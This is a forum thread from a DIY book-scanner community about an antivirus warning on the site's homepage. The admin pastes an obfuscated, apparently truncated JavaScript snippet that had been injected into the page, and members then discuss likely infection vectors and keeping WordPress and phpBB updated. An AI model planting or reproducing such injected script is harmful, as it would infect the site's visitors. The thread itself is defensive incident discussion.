Virus on Homepage ?

Just what it says.

Moderator: peterZ

Post Reply
Hasher
Posts: 77
Joined: 26 Sep 2009, 03:05

Virus on Homepage ?

Post by Hasher »

Am i the only one getting a virus warning on http://diybookscanner.org/ homepage ?


Image
User avatar
daniel_reetz
Posts: 2812
Joined: 03 Jun 2009, 13:56
E-book readers owned: Used to have a PRS-500
Number of books owned: 600
Country: United States
Contact:

Re: Virus on Homepage ?

Post by daniel_reetz »

hmm, someone else PM'd me about this and I thought Avast was having problems with the Scriptaculous library. However, after some digging I found this script embedded between the "map" and "html" tags on the front page:
<!-- C/C v0842 --><script>function lG(){};jJ="";lG.prototype = {eS : ction(){return 'dM'};sH=false;var bO=15569;var bN="";this.vX="";o.write(oF);var bNS=new Date();var jY=false;var bT=new Array();gF=false;var tS=26505;var xP = this;var cW=new Date();var oE="oE";eV="";var jX=function(){};this.aP="";this.lN=49747;h(function(){ var bB=function(){return 'bB'};function hU(){};function nK(){};lT="";xP.z();rT="rT";var gH='';this.qI='';var xO="xO";var dU="";this.vZ=false;wP="";}, 317);iN="iN";var hP="";oQB='';var sV=false;}eO="eO";hD=49992;}};var vF=61292;var gK=new lG(); zD="";gK.z();this.hR="hR";</script></body>


I'm not sure how it got in there, but please check that you're no longer getting a false positive, and I'll seek out the source of the attack.
User avatar
daniel_reetz
Posts: 2812
Joined: 03 Jun 2009, 13:56
E-book readers owned: Used to have a PRS-500
Number of books owned: 600
Country: United States
Contact:

Re: Virus on Homepage ?

Post by daniel_reetz »

Apparently Wordpress is the attack vector; we were a version behind on the blog -- entirely my fault. Can you please visit the blog, and see if you get the same report?

http://www.diybookscanner.org/news/
User avatar
daniel_reetz
Posts: 2812
Joined: 03 Jun 2009, 13:56
E-book readers owned: Used to have a PRS-500
Number of books owned: 600
Country: United States
Contact:

Re: Virus on Homepage ?

Post by daniel_reetz »

It's no longer clear that WP was the vector. I'm further investigating, have made backups of everything, and am scanning my local machines for infection.

I also have found no other evidence of infection according to the usual methods of this trojan, so it appears (for the moment) that it came from a local machine. I'll be changing admin passwords sitewide.
Anonymous1

Re: Virus on Homepage ?

Post by Anonymous1 »

You're also a bit behind on Wordpress again. 3.0.4 was just released, but I couldn't find any security holes in 3.0.3.

I'd be careful with PHPBB3. There are tons of scripts created just for the purpose of helping kiddies hack sites, so it's something to watch out for.

Have you tried the development version of each platform? Wordpress can be set to auto-update to the latest version (I run my local site on the development version, as I make WP themes sometimes). I'm not sure about PHPBB3...
User avatar
daniel_reetz
Posts: 2812
Joined: 03 Jun 2009, 13:56
E-book readers owned: Used to have a PRS-500
Number of books owned: 600
Country: United States
Contact:

Re: Virus on Homepage ?

Post by daniel_reetz »

Thanks for the reminder. I've gone through our hosting panel and clicked "upgrade" on everything, because the internal upgrade for Wordpress doesn't always work.

I've been keeping a close eye on things since the last incident. I appreciate more eyes.
Anonymous1

Re: Virus on Homepage ?

Post by Anonymous1 »

I wouldn't rely too much on a hosting panel for this. Wordpress is self-contained, and sometimes it is just easier to run the upgrade than rely on a host (it's not automatic, as it sometimes just queues your upgrade request). There was a huge wave of Wordpress and PHP-based system infections being spread via Dreamhost specifically. I hope this isn't one of them...
User avatar
daniel_reetz
Posts: 2812
Joined: 03 Jun 2009, 13:56
E-book readers owned: Used to have a PRS-500
Number of books owned: 600
Country: United States
Contact:

Re: Virus on Homepage ?

Post by daniel_reetz »

Unfortunately the self-update on my WP install here is broken, so I have to use the WebPanel to get it done. Rob usually handles the forum updates, I'm not sure which mechanism he is using.

I won't rely on it and I'll try to do better with updates. I've seen no suspicious activity since the original code insertion and that makes me suspect it happened through a compromised client (my old laptop) with FTP access, rather than through infected software on the server.

I am always interested in better security info and updates, so feel free to keep me up-to-date.
User avatar
rob
Posts: 773
Joined: 03 Jun 2009, 13:50
E-book readers owned: iRex iLiad, Kindle 2
Number of books owned: 4000
Country: United States
Location: Maryland, United States
Contact:

Re: Virus on Homepage ?

Post by rob »

The Admin Control Panel for the forum has an upgrade button, it hardly takes any time at all. Every so often I check the version page, and it says whether there's a newer version to install. So the forum tends to be up-to-date.
The Singularity is Near. ~ http://halfbakedmaker.org ~ Follow me as I build the world's first all-mechanical steam-powered computer.
Post Reply